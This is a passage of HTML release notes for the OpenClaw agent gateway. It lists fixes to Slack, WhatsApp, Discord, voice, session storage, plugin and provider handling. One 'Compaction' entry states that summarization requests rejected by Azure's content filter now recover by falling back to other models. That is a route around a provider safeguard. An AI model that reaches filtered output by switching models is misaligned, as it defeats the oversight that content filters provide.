<p>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</p>
</li>
<li>
<p>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</p>
</li>
<li>
<p>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</p>
</li>
<li>
<p>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</p>
</li>
<li>
<p>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</p>
</li>
<li>
<p>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</p>
</li>
<li>
<p>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</p>
</li>
<li>
<p>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</p>
</li>
<li>
<p>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</p>
</li>
<li>
<p>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</p>
</li>
<li>
<p>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</p>
</li>
<li>
<p>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</p>
</li>
<li>
<p>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</p>
</li>
<li>
<p>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</p>
</li>
<li>
<p>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</p>
</li>
<li>
<p>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</p>
</li>
<li>
<p>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</p>
</li>
<li>
<p>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</p>
</li>
<li>
<p>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</p>
</li>
<li>
<p>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</p>
</li>
<li>
<p>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</p>
</li>
<li>
<p>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</p>
</li>
<li>
<p>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</p>
</li>
<li>
<p>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</p>
</li>
<li>
<p>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</p>
</li>
<li>
<p>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</p>
</li>
<li>
<p>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</p>
</li>
<li>
<p>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</p>
</li>
<li>
<p>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</p>
</li>
<li>
<p>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</p>
</li>
<li>
<p>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</p>
</li>
<li>
<p>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</p>
</li>
<li>
<p>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</p>
</li>
<li>
<p>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</p>
</li>
<li>
<p>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Agents/tools: skip unavailable media generation and PDF tool factories from the live reply path when Gateway metadata and the active auth store prove no configured provider can back them, while keeping explicit config and auth-backed providers on the normal factory path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: reuse the Gateway metadata startup plan when ensuring reply runtime plugins are loaded, so live agent turns do not broad-load plugin runtimes after the Gateway already scoped startup activation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
